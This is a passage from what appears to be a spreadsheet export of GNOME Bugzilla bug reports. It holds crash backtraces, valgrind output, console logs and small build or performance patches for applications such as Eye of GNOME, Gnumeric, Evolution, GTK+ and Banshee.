No symbol table info available.
#25 0x40b52a19 in g_get_current_time () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#26 0x40b53837 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#27 0x40b53c13 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#28 0x40b53d96 in g_main_context_iteration () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#29 0x4068c5d6 in linc_main_iteration () from /usr/lib/liblinc.so.1
No symbol table info available.
#30 0x4065fc89 in giop_recv_buffer_get () from /usr/lib/libORBit-2.so.0
No symbol table info available.
#31 0x40663d6b in ORBit_small_freekids () from /usr/lib/libORBit-2.so.0
No symbol table info available.
#32 0x406642c0 in ORBit_small_invoke_stub () from
/usr/lib/libORBit-2.so.0
No symbol table info available.
#33 0x406641c3 in ORBit_small_invoke_stub_n () from
/usr/lib/libORBit-2.so.0
No symbol table info available.
#34 0x406411b2 in Bonobo_Unknown_unref ()
   from /usr/lib/libbonobo-activation.so.4
No symbol table info available.
#35 0x405ad7f0 in bonobo_object_release_unref () from
/usr/lib/libbonobo-2.so.0
No symbol table info available.
#36 0x0804d772 in adapt_shell_size_to_control ()
No symbol table info available.
#37 0x0804d8ff in adapt_shell_size_to_control ()
No symbol table info available.
#38 0x0804da2b in eog_window_open ()
No symbol table info available.
#39 0x0804d03f in eog_window_open_dialog ()
No symbol table info available.
#40 0x0804bfe2 in _start ()
No symbol table info available.
#41 0x40522c25 in bonobo_socket_add_id () from
/usr/lib/libbonoboui-2.so.0
No symbol table info available.
#42 0x40afce2b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#43 0x405b767b in bonobo_closure_invoke_va_list ()
   from /usr/lib/libbonobo-2.so.0
No symbol table info available.
#44 0x405b7891 in bonobo_closure_invoke () from
/usr/lib/libbonobo-2.so.0
No symbol table info available.
#45 0x40522aa1 in bonobo_socket_add_id () from
/usr/lib/libbonoboui-2.so.0
No symbol table info available.
#46 0x405bae83 in Bonobo_UIComponent_execVerb () from
/usr/lib/libbonobo-2.so.0
No symbol table info available.
#47 0x405285ab in bonobo_ui_engine_get_ui_container ()
   from /usr/lib/libbonoboui-2.so.0
No symbol table info available.
#48 0x40528761 in bonobo_ui_engine_get_ui_container ()
   from /usr/lib/libbonoboui-2.so.0
No symbol table info available.
#49 0x40b120f2 in g_cclosure_marshal_VOID__POINTER ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#50 0x40afd205 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#51 0x40afce2b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#52 0x40b10d8a in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#53 0x40b0f20a in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#54 0x40b0f4b5 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#55 0x4052a85f in bonobo_ui_engine_emit_verb_on_w ()
   from /usr/lib/libbonoboui-2.so.0
No symbol table info available.
#56 0x4052f1bc in bonobo_ui_sync_menu_add_popup ()
   from /usr/lib/libbonoboui-2.so.0
No symbol table info available.
#57 0x40b11796 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#58 0x40afce2b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#59 0x40b10993 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#60 0x40b0f20a in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#61 0x40832cdf in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#62 0x408b2efc in gtk_widget_activate () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#63 0x408092da in gtk_menu_shell_activate_item ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#64 0x4080879b in _gtk_menu_shell_activate () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#65 0x407fda62 in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#66 0x40afd205 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#67 0x40afce2b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#68 0x40b10d8a in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#69 0x40b0f277 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#70 0x40832cdf in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#71 0x408b2e2d in gtk_widget_send_expose () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#72 0x408b2a90 in gtk_widget_event () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#73 0x407fd913 in gtk_propagate_event () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#74 0x407fc91e in gtk_main_do_event () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#75 0x40a2904c in _gdk_events_queue () from
/usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#76 0x40b52a19 in g_get_current_time () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#77 0x40b53837 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#78 0x40b53c13 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#79 0x40b542ef in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#80 0x405a96df in bonobo_main () from /usr/lib/libbonobo-2.so.0
No symbol table info available.
#81 0x0804eb6b in main ()
No symbol table info available.
#82 0x40bac9d3 in __libc_start_main () from /lib/libc.so.6
No symbol table info available.
#0  0x40c322e9 in wait4 () from /lib/libc.so.6
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-10-31 17:43 -------
Unknown version 1.1.x in product EOG. Setting version to the default unspecified.
Reassigning to the default owner of the component eog-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>jwbaker</t>
  </si>
  <si>
    <t>GNUMERIC-492391</t>
  </si>
  <si>
    <t>Uninitialized value used in gnm_so_line_prep_sax_parser()</t>
  </si>
  <si>
    <t>Version: r16045
OS: Ubuntu Gutsy
Steps to reproduce:
- From gnumeric/src/ import test-indent.gnumeric:
G_SLICE=always-malloc ../libtool --mode=execute valgrind -q --freelist-vol=50000000 --suppressions=../test/common.supp ./gnumeric ../samples/test-indent.gnumeric
Valgrind output:
==7522== Conditional jump or move depends on uninitialised value(s)
==7522==    at 0x4123C97: gnm_so_line_prep_sax_parser (gnm-so-line.c:369)
==7522==    by 0x4171CEE: xml_sax_read_obj (xml-sax-read.c:2002)
==7522==    by 0x4171D91: xml_sax_object_start (xml-sax-read.c:2022)
==7522==    by 0x50153C1: push_child (gsf-libxml.c:495)
==7522==    by 0x50154D0: lookup_child (gsf-libxml.c:532)
==7522==    by 0x5015820: gsf_xml_in_start_element (gsf-libxml.c:602)
==7522==    by 0x50D045A: xmlParseStartTag (in /usr/lib/libxml2.so.2.6.30)
==7522==    by 0x50D98EB: xmlParseElement (in /usr/lib/libxml2.so.2.6.30)
==7522==    by 0x50D58AD: xmlParseContent (in /usr/lib/libxml2.so.2.6.30)
==7522==    by 0x50D9A2D: xmlParseElement (in /usr/lib/libxml2.so.2.6.30)
==7522==    by 0x50D58AD: xmlParseContent (in /usr/lib/libxml2.so.2.6.30)
==7522==    by 0x50D9A2D: xmlParseElement (in /usr/lib/libxml2.so.2.6.30)</t>
  </si>
  <si>
    <t>GNOME-MENUS-309693</t>
  </si>
  <si>
    <t>gmenu-simple-editor calls the Desktop menu Preferences</t>
  </si>
  <si>
    <t>This is a part of the bug opened here: https://bugzilla.ubuntu.com/12470
In the menu editor in the left pane the structure of the Gnome menu looks like :
&gt; Applications
   -
   -
   -
&gt; Preferences
   - Administration
   - Preferences
It says Preferences instead of System it's confusing.</t>
  </si>
  <si>
    <t>EVOLUTION-506948</t>
  </si>
  <si>
    <t>Copying Links does not decode ampersands correctly</t>
  </si>
  <si>
    <t>Version: 2.12
Problem w/ Copied Links in HTML Mail
1. Type a link containing an Ampersand (&amp;) into an HTML email and Evo will automatically turn it into a blue underlined link.
2. This will work to test on -- http://www.google.com/search?hl=en&amp;q=novell+sucks&amp;btnG=Search
3. Email that to yourself.
4. After you receive the message look at it in the message preview pane and right click the link choosing copy link location
5. Paste the link into the URL field of a browser and voila!  The link is now http://www.google.com/search?hl=enq=novell+sucksbtnG=Search
That's some crazy insane NOVELL-OSITY!  
Makes you wonder if people over there actually use this software or if it's just a big ad for Outlook.
Distribution: Fedora release 8 (Werewolf)
Gnome Release: 2.20.2 2007-11-27 (Red Hat Inc)
BugBuddy Version: 2.20.1</t>
  </si>
  <si>
    <t>LIBXML++-161925</t>
  </si>
  <si>
    <t>Inefficency in Node::find</t>
  </si>
  <si>
    <t>For large result sets Node::find is not as optimal as it could be.  The number
of nodes in the nodeset is known so the NodeSet return vector can be sized
appropriately:
--- libxml++/nodes/node.cc~     2004-12-17 08:52:36.000000000 -0500
+++ libxml++/nodes/node.cc      2004-12-21 17:14:48.000000000 -0500
@@ -1646 +1647 @@
   xmlNodeSet* nodeset = result-&gt;nodesetval
   NodeSet nodes
   if( nodeset ) {
+    nodes.reserve (nodeset-&gt;nodeNr)
     for (int i = 0 i != nodeset-&gt;nodeNr ++i)
       nodes.push_back(static_cast(nodeset-&gt;nodeTab[i]-&gt;_private))
   }</t>
  </si>
  <si>
    <t>gnome-bklyn</t>
  </si>
  <si>
    <t>GTK+-398414</t>
  </si>
  <si>
    <t>Printing to file with multiple pages per sheet</t>
  </si>
  <si>
    <t>It's impossible to select more than one page per sheet from printing dialog when printing to a file. This capability could be implemented by the application so even if it's not supported directly by gtk+ we should be able to enable it manually. A new capability GTK_PRINT_CAPABILITY_NUMBER_UP or something like that could be added so that we'll be able to enable this feature with gtk_print_unix_dialog_set_manual_capabilities().</t>
  </si>
  <si>
    <t>EVOLUTION-442303</t>
  </si>
  <si>
    <t>Evolution: One of the nasty things ...</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
One of the nasty things of evolution is the lack of importing previous mail. The only way (up till now) is to copy your previous mailboxes and all the stuff from a temporary place directly to the New Installed Evolution files e.g. Copy all mailings from a data folder to /home/username/.evolution.
Is their any other way? 
Distribution: openSUSE 10.2 (X86-64)
Gnome Release: 2.16.1 2006-11-28 (SUSE)
BugBuddy Version: 2.16.0</t>
  </si>
  <si>
    <t>harry.vorstenbosch</t>
  </si>
  <si>
    <t>GNOME-CORE-53947</t>
  </si>
  <si>
    <t>testgtk (and others) blows up on iconize</t>
  </si>
  <si>
    <t>On latest cvs snaps:
under most window managers testgtk programs (and almost all gtk programs)
blow up with:
Gdk-ERROR **: BadMatch (invalid parameter attributes)
  serial 4970 error_code 8 request_code 42 minor_code 0
aborting...
when you iconize and/or restore a window using wm iconize/restore buttons.
This happens regularly under IceWm and jerkily under sawfish windowmaker
blackbox and others (both with and without gnome panel running) more
frequently with testgtk and some example window opened.
here the backtrace:
Program received signal SIGTRAP Trace/breakpoint trap.
0x404460d1 in kill () from /lib/libc.so.6
(gdb) backtrace
#0  0x404460d1 in kill () from /lib/libc.so.6
#1  0x40445db9 in raise () from /lib/libc.so.6
#2  0x4008da1f in g_logv (log_domain=0x4010a59c Gdk 
    log_level=G_LOG_LEVEL_ERROR 
    format=0x4010a700 %s\n  serial %ld error_code %d request_code %d
minor_code %d\n args1=0xbfffed80) at gmessages.c:432
#3  0x4008dae9 in g_log (log_domain=0x4010a59c Gdk 
log_level=G_LOG_LEVEL_ERROR 
    format=0x4010a700 %s\n  serial %ld error_code %d request_code %d
minor_code %d\n args1=0xbfffed80) at gmessages.c:432
#3  0x4008dae9 in g_log (log_domain=0x4010a59c Gdk 
    log_level=G_LOG_LEVEL_ERROR 
    format=0x4010a700 %s\n  serial %ld error_code %d request_code %d
minor_code %d\n) at gmessages.c:462
#4  0x400f3e72 in gdk_x_error (display=0x807f2d0 error=0xbfffee2c)
    at gdkmain-x11.c:632
#5  0x4015508d in _XError () from /usr/X11R6/lib/libX11.so.6
#6  0x40152a19 in _XEventsQueued () from /usr/X11R6/lib/libX11.so.6
#7  0x40146833 in XPending () from /usr/X11R6/lib/libX11.so.6
#8  0x400ec776 in gdk_event_prepare (source=0x8082968 timeout=0xbffff7d8)
    at gdkevents-x11.c:1578
#9  0x40087b50 in g_main_context_prepare (context=0x80829c8 
    priority=0xbffff828) at gmain.c:1717
#10 0x40088039 in g_main_context_iterate (context=0x80829c8 block=1 
    dispatch=1) at gmain.c:1955
#11 0x40088654 in g_main_loop_run (loop=0x80828d0) at gmain.c:2203
#12 0x4030dbe9 in gtk_main () at gtkmain.c:644
#13 0x806c7e2 in main (argc=1 argv=0xbffff914) at testgtk.c:10293
#14 0x4043fcbe in __libc_start_main () from /lib/libc.so.6</t>
  </si>
  <si>
    <t>mmotta</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-80588</t>
  </si>
  <si>
    <t>Adjusting background causes fault (background-properties-capplet Crash at 152.3.165.109)</t>
  </si>
  <si>
    <t xml:space="preserve">Package: control-center
Version: 1.4.0.1
Severity: 
&gt;Synopsis: Adjusting background causes fault
&gt;Class: sw-bug
System: Solaris 8 Ultra 10
&gt;Description:
using control panel causes to adjust background causes failure whenever invoked
&gt;How-To-Repeat:
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-05-02 15:29 -------
The original reporter (dpotter@chg.mc.duke.edu) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component control-center-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>dpotter</t>
  </si>
  <si>
    <t>LIBGNOMEUI-398357</t>
  </si>
  <si>
    <t>Does not include $(X_CFLAGS)</t>
  </si>
  <si>
    <t>X_CFLAGS are used for testing the presence of libSM during configure but not whilst building. This results in a build failure under a hosted environment.
The fix is trivial:
Index: configure.in
===================================================================
--- configure.in        (revision 5243)
+++ configure.in        (working copy)
@@ -1626 +1627 @@
   gnome-vfs-2.0 &gt;= gnomevfs_required_version dnl
   $gnome_keyring_requirement
 PKG_CHECK_MODULES(LIBGNOMEUI [$GNOMEUI_MODULES])
+LIBGNOMEUI_CFLAGS=$X_CFLAGS $LIBGNOMEUI_CFLAGS
 LIBGNOMEUI_LIBS=$LIBGNOMEUI_LIBS $LIBJPEG
 GNOME_TEST_MODULES=dnl</t>
  </si>
  <si>
    <t>JHBUILD-504216</t>
  </si>
  <si>
    <t>Cairo doesn't build because of no pixman</t>
  </si>
  <si>
    <t>I'm running gnome-2.22 moduleset on Ubuntu gutsy.
Cairo seems to be recently updated to cairo-1.5.4.tar.gz which fails cause of no pixman. The pixman library isn't part of Ubuntu main repositories.
Pixman should be added to jhbuild.
.
.
.
checking for zlib.h... yes
checking for pkg-config... /opt/gnome2/bin/pkg-config
checking pkg-config is at least version 0.9.0... yes
checking for pixman... no
configure: error: pixman &gt;= 0.9.4 is required
(http://cairographics.org/releases/)</t>
  </si>
  <si>
    <t>cskeogh</t>
  </si>
  <si>
    <t>DASHER-328903</t>
  </si>
  <si>
    <t>Tab order broken on Win32 dialogues</t>
  </si>
  <si>
    <t>As it says...</t>
  </si>
  <si>
    <t>EVOLUTION-231196</t>
  </si>
  <si>
    <t>many dialogs end up being too large</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Cosmetic
Version: 1.1.1.99
Synopsis: many dialogs end up being too large
Bugzilla-Product: Evolution
Bugzilla-Component: Miscellaneous
Description:
Description of Problem:
Many dialogs such as confirmation to close a message w/ a large subject
or the dialog that pops up to ask you to accept an ssl key end up being
too long or close to too long for my 1024x768 display. There should
probably be code that causes the text to wrap at a maximum size.
Steps to reproduce the problem:
1. use ssl for any service	
or
1. close an unsent message w/ a really long subject line
Actual Results: get a really long dialog box with buttons possibly off
the screen
Expected Results: a normal sized dialog box
How often does this happen? whenever one does the above.
Additional Information:
Unknown reporter: spotter@cs.columbia.edu changed to bugbuddy-import@ximian.com.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>DESKBAR-APPLET-526574</t>
  </si>
  <si>
    <t>crash in Deskbar: I was just doing a regul...</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
I was just doing a regular search
Distribution: Ubuntu 8.04 (hardy)
Gnome Release: 2.22.0 2008-04-01 (Ubuntu)
BugBuddy Version: 2.22.0
System: Linux 2.6.24-14-generic #1 SMP Thu Apr 3 04:49:29 UTC 2008 i686
X Vendor: The X.Org Foundation
X Vendor Release: 10400090
Selinux: No
Accessibility: Disabled
GTK+ Theme: Human-Murrine-Hacked
Icon Theme: nuoveXT.2.2
Memory status: size: 0 vsize: 0 resident: 0 share: 0 rss: 0 rss_rlim: 0
CPU usage: start_time: 0 rtime: 0 utime: 0 stime: 0 cutime:0 cstime: 0 timeout: 0 it_real_value: 0 frequency: 0
----------- .xsession-errors (686 sec old) ---------------------
(evolution:6823): camel-CRITICAL **: camel_object_is: assertion `check_magic(o ctype CAMEL_OBJECT_MAGIC)' failed
(evolution:6823): camel-CRITICAL **: camel_object_unref: assertion `CAMEL_IS_OBJECT(o)' failed
(evolution:6823): camel-WARNING **: Trying to check junk data is OBJECT 'CamelObject'
(evolution:6823): camel-CRITICAL **: camel_object_is: assertion `check_magic(o ctype CAMEL_OBJECT_MAGIC)' failed
(evolution:6823): camel-CRITICAL **: camel_object_unhook_event: assertion `CAMEL_IS_OBJECT (obj)' failed
(evolution:6823): camel-WARNING **: Trying to check junk data is OBJECT 'CamelObject'
(evolution:6823): camel-CRITICAL **: camel_object_is: assertion `check_magic(o ctype CAMEL_OBJECT_MAGIC)' failed
(evolution:6823): camel-CRITICAL **: camel_object_unref: assertion `CAMEL_IS_OBJECT(o)' failed
--------------------------------------------------
Traceback (most recent call last):
  File /var/lib/python-support/python2.5/dbus/connection.py line 563 in msg_reply_handler
    reply_handler(*message.get_args_list(**get_args_opts))
  File /usr/lib/deskbar-applet/modules-2.20-compatible/tomboy.py line 168 in 
    reply_handler=lambda notes: self.handle_searchnotes( text notes )
  File /usr/lib/deskbar-applet/modules-2.20-compatible/tomboy.py line 154 in handle_searchnotes
    if tomboy().NoteExists(note):
  File /var/lib/python-support/python2.5/dbus/proxies.py line 140 in __call__
    **keywords)
  File /var/lib/python-support/python2.5/dbus/connection.py line 607 in call_blocking
    message timeout)
DBusException: org.freedesktop.DBus.Error.NoMemory: Not enough memory</t>
  </si>
  <si>
    <t>dave81</t>
  </si>
  <si>
    <t>BANSHEE-528947</t>
  </si>
  <si>
    <t>GUI locks up (does not repaint) while playing</t>
  </si>
  <si>
    <t>I did not perform any explicit GUI action that triggered this lockup. Was using other programs on a different workspace then switched back to the workspace banshee was running on and noticed that the GUI window was gray (was not repainting).
The current song CONTINUED to play until it was finished then playing stopped. No additional console output was generated. CPU usage was normal.
CONSOLE OUTPUT FOLLOWS:
Archimedes ~/code/banshee % make run
~/code/banshee/bin ~/code/banshee
[Debug 13:55:03.482] Configuration client extension loaded (Banshee.GnomeBackend.GConfConfigurationClient)
[Warn  13:55:03.811] DBus support could not be started. Disabling for this session.
[Debug 13:55:03.824] Core service started (DBusServiceManager 0.266598s)
[Debug 13:55:04.017] Core service started (DbConnection 0.191819s)
[Debug 13:55:04.078] Core service started (SourceManager 0.003732s)
[Debug 13:55:04.473] Core service started (MediaProfileManager 0.394877s)
[Debug 13:55:04.476] Core service started (PlayerEngine 0.002675s)
[Debug 13:55:04.604] Core service started (PlaybackController 0.002204s)
[Debug 13:55:04.605] Core service started (ImportSourceManager 0.000164s)
[Debug 13:55:04.617] Core service started (LibraryImportManager 0.012109s)
[Debug 13:55:04.619] Core service started (UserJobManager 0.001126s)
[Debug 13:55:04.654] Core service started (HardwareManager 0.035073s)
[Debug 13:55:04.702] Adding icon theme search path: /home/teratorn/code/banshee/bin/share/banshee-1/icons
[Debug 13:55:04.704] Core service started (GtkElementsService 0.050035s)
[Debug 13:55:04.815] Core service started (InterfaceActionService 0.111098s)
[Debug 13:55:04.817] Core service started (ArtworkManager 0.001433s)
[Debug 13:55:05.534] Text renderer: Cairo
[Debug 13:55:06.038] Core service started (NereidPlayerInterface 1.221253s)
[Debug 13:55:06.122] Extension service started (AudioCdService 0.083319s)
[Debug 13:55:06.134] Dap support extension loaded: Banshee.Dap.MassStorage
[Debug 13:55:06.235] IO provider extension loaded (Banshee.IO.Unix.Provider)
[Debug 13:55:06.559] Extension service started (DapService 0.43704s)
System.ApplicationException: No support GNOME Settings Daemon could be reached.
  at Banshee.MultimediaKeys.MultimediaKeysService.Banshee.ServiceStack.IExtensionService.Initialize () [0x000bc] in /home/teratorn/code/banshee/src/Extensions/Banshee.MultimediaKeys/Banshee.MultimediaKeys/MultimediaKeysService.cs:117 
  at Banshee.ServiceStack.ServiceManager.Run () [0x0015e] in /home/teratorn/code/banshee/src/Core/Banshee.Services/Banshee.ServiceStack/ServiceManager.cs:136 
[Warn  13:55:06.572] Extension `Banshee.MultimediaKeys.MultimediaKeysService' not started: No support GNOME Settings Daemon could be reached.
[Debug 13:55:06.596] Extension service started (BookmarksService 0.023912s)
[Debug 13:55:06.600] Extension service started (GnomeService 0.004466s)
[Debug 13:55:06.725] Extension service started (NotificationAreaService 0.124345s)
[Debug 13:55:06.793] Audioscrobbler state: connected
[Debug 13:55:06.803] Extension service started (AudioscrobblerService 0.077732s)
[Debug 13:55:07.088] GStreamer pipeline does not run: audioconvert ! lame mode=4 bitrate=128 ! id3v2mux
[Debug 13:55:07.091] GStreamer pipeline does not run: audioconvert ! xingenc bitrate=128 ! id3v2mux
[Debug 13:55:07.215] GStreamer pipeline does not run: audioconvert ! fluwmaenc bitrate=64000 vbr=false ! fluasfmux
[Debug 13:55:07.215] Extension service started (GStreamerCoreService 0.412096s)
[Info  13:55:07.245] All services are started 3.698829s
[Debug 13:55:20.341] Querying model for track to play in Song:Next mode
[Debug 13:55:21.442] TrackInfoDisplay RenderAnimation: 20.00 FPS
[Debug 13:55:23.040] Downloaded cover art from Amazon - rush-signals
[Debug 13:55:24.105] TrackInfoDisplay RenderAnimation: 31.00 FPS
* WARNING *: Provide a DLL Map for libgobject-2.0-0.dll
[Debug 14:00:19.100] (libbanshee:player) bp_stop: setting state to GST_STATE_NULL
[Debug 14:00:19.198] Querying model for track to play in Song:Next mode
[Warn  14:00:20.416] Cannot show notification - An exception was thrown by the type initializer for Notifications.Notification
[Debug 14:00:20.417] TrackInfoDisplay RenderAnimation: 2.00 FPS
Domain: 'Gtk' Level: Critical
Message: gtk_widget_event: assertion `WIDGET_REALIZED_FOR_EVENT (widget event)' failed
Trace follows:
   at GLib.Log.PrintTraceLogFunction(System.String domain LogLevelFlags level System.String message)
   at GLib.Log.PrintTraceLogFunction(IntPtr  LogLevelFlags  IntPtr )
   at Gtk.Application.gtk_main()
   at Gtk.Application.gtk_main()
   at Gtk.Application.Run()
   at Banshee.Gui.GtkBaseClient.Run()
   at Banshee.Gui.GtkBaseClient.Startup()
   at Hyena.Gui.CleanRoomStartup.Startup(Hyena.Gui.StartupInvocationHandler startup)
   at Banshee.Gui.GtkBaseClient.Entry()
   at Nereid.Client.Main()
[Debug 14:00:21.034] Downloaded cover art from Amazon - rush-hemispheres
[Debug 14:00:22.126] TrackInfoDisplay RenderAnimation: 30.00 FPS</t>
  </si>
  <si>
    <t>teratorn</t>
  </si>
  <si>
    <t>DESKBAR-APPLET-326706</t>
  </si>
  <si>
    <t>[Dapper] deskbar applet does not respond to [enter]</t>
  </si>
  <si>
    <t>Forwarded from: https://launchpad.net/distros/ubuntu/+source/deskbar-applet/+bug/6690
Deskbar applet has been working for me on dapper up until maybe a week ago. Now it does not respond to [enter] in the entry widget to actually do a search. I can right-click on the applet and set preferences and I can enter text in the entry but cannot search.
deskbar-applet 0.8.7-0ubuntu1</t>
  </si>
  <si>
    <t>ORBIT-CPP-115493</t>
  </si>
  <si>
    <t>idl-compiler</t>
  </si>
  <si>
    <t>ORBIT-CPP</t>
  </si>
  <si>
    <t>generated everything-common.h doesn't compile</t>
  </si>
  <si>
    <t>The idl-compiler generates code that does not compile for the following
file (everything.idl slightly modified from the version in ORBit2). Things
start going astray around line 227 where a class definition is messed up:
namespace test
{
        class DerivedServer_ptr{
        ::test::DerivedServer *m_target
public:
                DerivedServer_ptr() : m_target (0) {}
                DerivedServer_ptr(::test::DerivedServer *ptr) :
m_target(ptr) {}
                        DerivedServer_ptr &amp;operator =(::test::DerivedServer
*ptr)
                {
m_target = ptr
return *this
                }
...</t>
  </si>
  <si>
    <t>bowie.owens</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-50669</t>
  </si>
  <si>
    <t>Adding bg images</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  control-center
Severity: normal
Version:  1.2.2
Synopsis: Adding bg images
Class:    sw-bug
Distribution: Red Hat Linux release 7.0 (Guinness)
System: Linux 2.2.16-22 i586 unknown
C library: glibc-2.2-9
C compiler: 2.96
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.6
gnome-libs: gnome-libs 1.2.8
libxml: 1.8.10
gnome-print: gnome-print-0.25-8_helix_1
gnome-core: gnome-core 1.2.4
Description:
Trying to add this really hot female to my desktop... my girlfriend will
probably kill me. But I'd still really like the opportunity to control
my own destiny :}
Other than that gnome is kicking. A lot of improvements. Great job
peoples :}
Debugging information:
(no debugging symbols found)...(no debugging symbols found)...
0x40626ce9 in __wait4 () from /lib/libc.so.6
#0  0x40626ce9 in __wait4 () from /lib/libc.so.6
#1  0x40692aa8 in __DTOR_END__ () from /lib/libc.so.6
#2  0x40155f58 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  
#4  0x405efe59 in chunk_free (ar_ptr=0x40690f60 p=0x80d12c0) at malloc.c:3132
#5  0x405efc08 in __libc_free (mem=0x80d12c8) at malloc.c:3044
#6  0x4056981b in free_buffer () from /usr/lib/libgdk_pixbuf.so.2
#7  0x405697ea in gdk_pixbuf_finalize () from /usr/lib/libgdk_pixbuf.so.2
#8  0x405696fc in gdk_pixbuf_unref () from /usr/lib/libgdk_pixbuf.so.2
#9  0x804d1ff in copyState ()
#10 0x804dcb2 in copyState ()
#11 0x402a39e3 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#12 0x402d5d4a in gtk_handlers_run () from /usr/lib/libgtk-1.2.so.0
#13 0x402d508d in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#14 0x402d2e35 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#15 0x4023b98d in gtk_button_clicked () from /usr/lib/libgtk-1.2.so.0
#16 0x4023d1ed in gtk_real_button_released () from /usr/lib/libgtk-1.2.so.0
#17 0x402a39e3 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#18 0x402d4f18 in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#19 0x402d2e35 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#20 0x4023b8bd in gtk_button_released () from /usr/lib/libgtk-1.2.so.0
#21 0x4023cad7 in gtk_button_button_release () from /usr/lib/libgtk-1.2.so.0
#22 0x402a36ae in gtk_marshal_BOOL__POINTER () from /usr/lib/libgtk-1.2.so.0
#23 0x402d50cc in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#24 0x402d2e35 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#25 0x4030d229 in gtk_widget_event () from /usr/lib/libgtk-1.2.so.0
#26 0x402a3625 in gtk_propagate_event () from /usr/lib/libgtk-1.2.so.0
#27 0x402a26ef in gtk_main_do_event () from /usr/lib/libgtk-1.2.so.0
#28 0x40357c21 in gdk_event_dispatch () from /usr/lib/libgdk-1.2.so.0
#29 0x4008a987 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#30 0x4008b001 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#31 0x4008b1cc in g_main_run () from /usr/lib/libglib-1.2.so.0
#32 0x402a1f87 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#33 0x40023635 in capplet_corba_gtk_main () from /usr/lib/libcapplet.so.0
#34 0x40022f47 in capplet_gtk_main () from /usr/lib/libcapplet.so.0
#35 0x804fc6d in main ()
#36 0x40591bfc in __libc_start_main (main=0x804fb00  argc=3 
    ubp_av=0xbffffa54 init=0x804af94  fini=0x804fd0c  
    rtld_fini=0x4000d674  stack_end=0xbffffa4c)
    at ../sysdeps/generic/libc-start.c:118
#0  0x40626ce9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x40692aa8 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x40155f58 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  
No locals.
#4  0x405efe59 in chunk_free (ar_ptr=0x40690f60 p=0x80d12c0) at malloc.c:3132
hd = 4294966784
sz = 52144
idx = 1073795104
next = 0x80dde70
nextsz = 0
prevsz = 4294966784
bck = 0x0
fwd = 0x0
islr = 0
heap = (heap_info *) 0xbfffeaa0
hd = 4294966784
sz = 52144
idx = 1073795104
next = 0x80dde70
nextsz = 0
prevsz = 4294966784
bck = 0x0
fwd = 0x0
islr = 0
heap = (heap_info *) 0xbfffeaa0
heap = (heap_info *) 0xbfffeaa0
